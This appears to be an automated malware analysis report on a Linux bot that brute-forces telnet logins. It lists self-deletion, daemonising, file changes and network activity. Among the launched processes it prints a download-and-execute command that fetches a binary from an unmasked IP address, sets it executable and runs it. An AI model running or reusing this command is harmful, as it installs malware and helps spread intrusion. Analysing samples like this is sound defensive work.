Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Substitutes application name for:
- vge1o4mggva3jdrch574qan28k5fgp8m
Launches processes:
- sh -c wget http://178.62.227.13/wrgjwrgjwrg246356356356/n1; chmod 777 *; ./n1 wget.honey.echo.telnet.x86
- wget http://178.62.227.13/wrgjwrgjwrg246356356356/n1
- chmod 777 n1 run.sh stdout.log
- ./n1 wget.honey.echo.telnet.x86
Performs operations with the file system:
Modifies file access rights:
- /root/n1
- /root/run.sh
Creates or modifies files:
- /root/n1
Deletes files:
- /root/n1
Network activity:
Awaits incoming connections on ports:
- 127.0.0.1:13562
- 0.0.0.0:23
Establishes connection:
- 8.#.8.8:53
- 17#.##.227.13:3456
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
- 17#.##.###.#3/wrgjwrgjwrg246356356356/n1
Sends data to the following servers:
- 17#.##.227.13:3456
Receives data from the following servers:
- 17#.##.227.13:3456
